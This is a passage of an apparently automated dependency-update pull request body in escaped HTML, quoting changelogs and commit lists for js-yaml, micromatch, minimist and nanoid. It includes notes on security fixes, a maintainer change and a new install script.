parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/37caaad57dc37d350d9a4577a5da53f482bb2983\"\u003e\u003ccode\u003e37caaad\u003c/code\u003e\u003c/a\u003e 3.14.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/094c0f7a79e6ff9e2b4d50b22686d2586894b58f\"\u003e\u003ccode\u003e094c0f7\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9586ebe23298427d26b3479979bd6499bf3a14c2\"\u003e\u003ccode\u003e9586ebe\u003c/code\u003e\u003c/a\u003e Avoid calling hasOwnProperty of user-controlled objects\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.0...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `micromatch` from 4.0.4 to 4.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/micromatch/releases\"\u003emicromatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.0.8\u003c/h2\u003e\n\u003cp\u003eUltimate release that fixes both CVE-2024-4067 and CVE-2024-4068. We consider the issues low-priority, so even if you see automated scanners saying otherwise, don't be scared.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/micromatch/blob/master/CHANGELOG.md\"\u003emicromatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.0.8] - 2024-08-22\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebackported CVE-2024-4067 fix (from v4.0.6) over to 4.x branch\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.7] - 2024-05-22\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ethis is basically v4.0.5, with some README updates\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eit is vulnerable to CVE-2024-4067\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eUpdated braces to v3.0.3 to avoid CVE-2024-4068\u003c/li\u003e\n\u003cli\u003edoes NOT break API compatibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.6] - 2024-05-21\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003ehasBraces\u003c/code\u003e to check if a pattern contains braces.\u003c/li\u003e\n\u003cli\u003eFixes CVE-2024-4067\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBREAKS API COMPATIBILITY\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eShould be labeled as a major release, but it's not.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.1 - 4.0.5]\u003c/h2\u003e\n\u003ch2\u003e[4.0.0] - 2019-03-20\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdds support for \u003ccode\u003eoptions.onMatch\u003c/code\u003e. See the readme for details\u003c/li\u003e\n\u003cli\u003eAdds support for \u003ccode\u003eoptions.onIgnore\u003c/code\u003e. See the readme for details\u003c/li\u003e\n\u003cli\u003eAdds support for \u003ccode\u003eoptions.onResult\u003c/code\u003e. See the readme for details\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBreaking changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRequire Node.js \u0026gt;= 8.6\u003c/li\u003e\n\u003cli\u003eRemoved support for passing an array of brace patterns to \u003ccode\u003emicromatch.braces()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eTo strictly enforce closing brackets (for \u003ccode\u003e{\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, and \u003ccode\u003e(\u003c/code\u003e), you must now use \u003ccode\u003estrictBrackets=true\u003c/code\u003e instead of \u003ccode\u003estrictErrors\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecache\u003c/code\u003e - caching and all related options and methods have been removed\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.unixify\u003c/code\u003e was renamed to \u003ccode\u003eoptions.windows\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.nodupes\u003c/code\u003e Was removed. Duplicates are always removed by default. You can override this with custom behavior by using the \u003ccode\u003eonMatch\u003c/code\u003e, \u003ccode\u003eonResult\u003c/code\u003e and \u003ccode\u003eonIgnore\u003c/code\u003e functions.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.snapdragon\u003c/code\u003e was removed, as snapdragon is no longer used.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.sourcemap\u003c/code\u003e was removed, as snapdragon is no longer used, which provided sourcemap support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[3.0.0] - 2017-04-11\u003c/h2\u003e\n\u003cp\u003eComplete overhaul, with 36,000+ new unit tests validated against actual output generated by Bash and minimatch. More specifically, 35,000+ of the tests:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003emicromatch results are directly compared to bash results\u003c/li\u003e\n\u003cli\u003ein rare cases, when micromatch and bash disagree, micromatch's results are compared to minimatch's results\u003c/li\u003e\n\u003cli\u003emicromatch is much more accurate than minimatch, so there were cases where I had to make assumptions. I'll try to document these.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThis refactor introduces a parser and compiler that are supersets of more granular parsers and compilers from other sub-modules. Each of these sub-modules has a singular responsibility and focuses on a certain type of matching that aligns with a specific part of the Bash \u0026quot;expansion\u0026quot; API.\u003c/p\u003e\n\u003cp\u003eThese sub-modules work like plugins to seamlessly create the micromatch parser/compiler, so that strings are parsed in one pass, an \u003ca href=\"https://gist.github.com/jonschlinkert/099c8914f56529f75bc757cc9e5e8e2a\"\u003eAST is created\u003c/a\u003e, then a new string is generated by the compiler.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/8bd704ec0d9894693d35da425d827819916be920\"\u003e\u003ccode\u003e8bd704e\u003c/code\u003e\u003c/a\u003e 4.0.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/a0e68416a44da10f3e4e30845ab95af4fd286d5a\"\u003e\u003ccode\u003ea0e6841\u003c/code\u003e\u003c/a\u003e run verb to generate README documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/4ec288484f6e8cccf597ad3d43529c31d0f7a02a\"\u003e\u003ccode\u003e4ec2884\u003c/code\u003e\u003c/a\u003e Merge branch 'v4' into hauserkristof-feature/v4.0.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/03aa8052171e878897eee5d7bb2ae0ae83ec2ade\"\u003e\u003ccode\u003e03aa805\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/micromatch/issues/266\"\u003e#266\u003c/a\u003e from hauserkristof/feature/v4.0.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/814f5f70efcd100ca9d29198867812a3d6ab91a8\"\u003e\u003ccode\u003e814f5f7\u003c/code\u003e\u003c/a\u003e lint\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/67fcce6a1077c2faf5ad0c5f998fa70202cc5dae\"\u003e\u003ccode\u003e67fcce6\u003c/code\u003e\u003c/a\u003e fix: CHANGELOG about braces \u0026amp; CVE-2024-4068, v4.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/113f2e3fa7cb30b429eda7c4c38475a8e8ba1b30\"\u003e\u003ccode\u003e113f2e3\u003c/code\u003e\u003c/a\u003e fix: CVE numbers in CHANGELOG\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/d9dbd9a266686f44afb38da26fe016f96d1ec04f\"\u003e\u003ccode\u003ed9dbd9a\u003c/code\u003e\u003c/a\u003e feat: updated CHANGELOG\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/2ab13157f416679f54e3a32b1425e184bd16749e\"\u003e\u003ccode\u003e2ab1315\u003c/code\u003e\u003c/a\u003e fix: use actions/setup-node@v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/1406ea38f3e24b29f4d4f46908d5cffcb3e6c4ce\"\u003e\u003ccode\u003e1406ea3\u003c/code\u003e\u003c/a\u003e feat: rework test to work on macos with node 10,12 and 14\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/micromatch/compare/4.0.4...4.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `minimist` from 1.2.5 to 1.2.8\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/minimistjs/minimist/blob/main/CHANGELOG.md\"\u003eminimist's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/minimistjs/minimist/compare/v1.2.7...v1.2.8\"\u003ev1.2.8\u003c/a\u003e - 2023-02-09\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] Fix long option followed by single dash \u003ca href=\"https://redirect.github.com/minimistjs/minimist/pull/17\"\u003e\u003ccode\u003e[#17](https://github.com/minimistjs/minimist/issues/17)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] Remove duplicate test \u003ca href=\"https://redirect.github.com/minimistjs/minimist/pull/12\"\u003e\u003ccode\u003e[#12](https://github.com/minimistjs/minimist/issues/12)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] opt.string works with multiple aliases \u003ca href=\"https://redirect.github.com/minimistjs/minimist/pull/10\"\u003e\u003ccode\u003e[#10](https://github.com/minimistjs/minimist/issues/10)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] Fix long option followed by single dash (\u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/17\"\u003e#17\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/15\"\u003e\u003ccode\u003e[#15](https://github.com/minimistjs/minimist/issues/15)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] Remove duplicate test (\u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/12\"\u003e#12\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/8\"\u003e\u003ccode\u003e[#8](https://github.com/minimistjs/minimist/issues/8)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Fix long option followed by single dash \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/15\"\u003e\u003ccode\u003e[#15](https://github.com/minimistjs/minimist/issues/15)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] opt.string works with multiple aliases (\u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/10\"\u003e#10\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/9\"\u003e\u003ccode\u003e[#9](https://github.com/minimistjs/minimist/issues/9)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Fix handling of short option with non-trivial equals \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/5\"\u003e\u003ccode\u003e[#5](https://github.com/minimistjs/minimist/issues/5)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] Remove duplicate test \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/8\"\u003e\u003ccode\u003e[#8](https://github.com/minimistjs/minimist/issues/8)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] opt.string works with multiple aliases \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/9\"\u003e\u003ccode\u003e[#9](https://github.com/minimistjs/minimist/issues/9)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMerge tag 'v0.2.3' \u003ca href=\"https://github.com/minimistjs/minimist/commit/a0267947c7870fc5847cf2d437fbe33f392767da\"\u003e\u003ccode\u003ea026794\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix indentation and whitespace \u003ca href=\"https://github.com/minimistjs/minimist/commit/5368ca4147e974138a54cc0dc4cea8f756546b70\"\u003e\u003ccode\u003e5368ca4\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix indentation and whitespace \u003ca href=\"https://github.com/minimistjs/minimist/commit/e5f5067259ceeaf0b098d14bec910f87e58708c7\"\u003e\u003ccode\u003ee5f5067\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] more cleanup \u003ca href=\"https://github.com/minimistjs/minimist/commit/62fde7d935f83417fb046741531a9e2346a36976\"\u003e\u003ccode\u003e62fde7d\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] more cleanup \u003ca href=\"https://github.com/minimistjs/minimist/commit/36ac5d0d95e4947d074e5737d94814034ca335d1\"\u003e\u003ccode\u003e36ac5d0\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/73923d223553fca08b1ba77e3fbc2a492862ae4c\"\u003e\u003ccode\u003e73923d2\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[actions] add reusable workflows \u003ca href=\"https://github.com/minimistjs/minimist/commit/d80727df77bfa9e631044d7f16368d8f09242c91\"\u003e\u003ccode\u003ed80727d\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] add eslint; rules to enable later are warnings \u003ca href=\"https://github.com/minimistjs/minimist/commit/48bc06a1b41f00e9cdf183db34f7a51ba70e98d4\"\u003e\u003ccode\u003e48bc06a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix indentation \u003ca href=\"https://github.com/minimistjs/minimist/commit/34b0f1ccaa45183c3c4f06a91f9b405180a6f982\"\u003e\u003ccode\u003e34b0f1c\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[readme] rename and add badges \u003ca href=\"https://github.com/minimistjs/minimist/commit/5df0fe49211bd09a3636f8686a7cb3012c3e98f0\"\u003e\u003ccode\u003e5df0fe4\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] switch from \u003ccode\u003ecovert\u003c/code\u003e to \u003ccode\u003enyc\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/a48b128fdb8d427dfb20a15273f83e38d97bef07\"\u003e\u003ccode\u003ea48b128\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003ecovert\u003c/code\u003e, \u003ccode\u003etape\u003c/code\u003e; remove unnecessary \u003ccode\u003etap\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/f0fb958e9a1fe980cdffc436a211b0bda58f621b\"\u003e\u003ccode\u003ef0fb958\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] create FUNDING.yml; add \u003ccode\u003efunding\u003c/code\u003e in package.json \u003ca href=\"https://github.com/minimistjs/minimist/commit/3639e0c819359a366387e425ab6eabf4c78d3caa\"\u003e\u003ccode\u003e3639e0c\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] use \u003ccode\u003enpmignore\u003c/code\u003e to autogenerate an npmignore file \u003ca href=\"https://github.com/minimistjs/minimist/commit/be2e038c342d8333b32f0fde67a0026b79c8150e\"\u003e\u003ccode\u003ebe2e038\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOnly apps should have lockfiles \u003ca href=\"https://github.com/minimistjs/minimist/commit/282b570e7489d01b03f2d6d3dabf79cd3e5f84cf\"\u003e\u003ccode\u003e282b570\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eisConstructorOrProto adapted from PR \u003ca href=\"https://github.com/minimistjs/minimist/commit/ef9153fc52b6cea0744b2239921c5dcae4697f11\"\u003e\u003ccode\u003eef9153f\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eaud\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/098873c213cdb7c92e55ae1ef5aa1af3a8192a79\"\u003e\u003ccode\u003e098873c\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eaud\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/3124ed3e46306301ebb3c834874ce0241555c2c4\"\u003e\u003ccode\u003e3124ed3\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] add \u003ccode\u003esafe-publish-latest\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/4b927de696d561c636b4f43bf49d4597cb36d6d6\"\u003e\u003ccode\u003e4b927de\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add \u003ccode\u003eaud\u003c/code\u003e in \u003ccode\u003eposttest\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/b32d9bd0ab340f4e9f8c3a97ff2a4424f25fab8c\"\u003e\u003ccode\u003eb32d9bd\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] update repo URLs \u003ca href=\"https://github.com/minimistjs/minimist/commit/f9fdfc032c54884d9a9996a390c63cd0719bbe1a\"\u003e\u003ccode\u003ef9fdfc0\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[actions] Avoid 0.6 tests due to build failures \u003ca href=\"https://github.com/minimistjs/minimist/commit/ba92fe6ebbdc0431cca9a2ea8f27beb492f5e4ec\"\u003e\u003ccode\u003eba92fe6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003etape\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/950eaa74f112e04d23e9c606c67472c46739b473\"\u003e\u003ccode\u003e950eaa7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] add missing \u003ccode\u003enpmignore\u003c/code\u003e dev dep \u003ca href=\"https://github.com/minimistjs/minimist/commit/3226afaf09e9d127ca369742437fe6e88f752d6b\"\u003e\u003ccode\u003e3226afa\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMerge tag 'v0.2.2' \u003ca href=\"https://github.com/minimistjs/minimist/commit/980d7ac61a0b4bd552711251ac107d506b23e41f\"\u003e\u003ccode\u003e980d7ac\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/minimistjs/minimist/compare/v1.2.6...v1.2.7\"\u003ev1.2.7\u003c/a\u003e - 2022-10-10\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/6901ee286bc4c16da6830b48b46ce1574703cea1\"\u003e\u003ccode\u003e6901ee2\u003c/code\u003e\u003c/a\u003e v1.2.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/a0267947c7870fc5847cf2d437fbe33f392767da\"\u003e\u003ccode\u003ea026794\u003c/code\u003e\u003c/a\u003e Merge tag 'v0.2.3'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/c0b26618322e94adea26c68e613ef0be482c6c63\"\u003e\u003ccode\u003ec0b2661\u003c/code\u003e\u003c/a\u003e v0.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/63b8fee87b8e7a003216d5d77ba5d6decf3cfb0d\"\u003e\u003ccode\u003e63b8fee\u003c/code\u003e\u003c/a\u003e [Fix] Fix long option followed by single dash (\u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/17\"\u003e#17\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/72239e6f0ea77d8be0ad4f682b7ae7d142144395\"\u003e\u003ccode\u003e72239e6\u003c/code\u003e\u003c/a\u003e [Tests] Remove duplicate test (\u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/12\"\u003e#12\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/34b0f1ccaa45183c3c4f06a91f9b405180a6f982\"\u003e\u003ccode\u003e34b0f1c\u003c/code\u003e\u003c/a\u003e [eslint] fix indentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/3226afaf09e9d127ca369742437fe6e88f752d6b\"\u003e\u003ccode\u003e3226afa\u003c/code\u003e\u003c/a\u003e [Dev Deps] add missing \u003ccode\u003enpmignore\u003c/code\u003e dev dep\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/098873c213cdb7c92e55ae1ef5aa1af3a8192a79\"\u003e\u003ccode\u003e098873c\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eaud\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/9ec4d279ced72ea2f60237218e71cc03aa0dfdd6\"\u003e\u003ccode\u003e9ec4d27\u003c/code\u003e\u003c/a\u003e [Fix] Fix long option followed by single dash\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/ba92fe6ebbdc0431cca9a2ea8f27beb492f5e4ec\"\u003e\u003ccode\u003eba92fe6\u003c/code\u003e\u003c/a\u003e [actions] Avoid 0.6 tests due to build failures\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/minimistjs/minimist/compare/v1.2.5...v1.2.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ljharb\"\u003eljharb\u003c/a\u003e, a new releaser for minimist since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `nanoid` from 3.1.12 to 3.1.20\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ai/nanoid/blob/main/CHANGELOG.md\"\u003enanoid's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.20\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix ES modules support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.19\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReduced 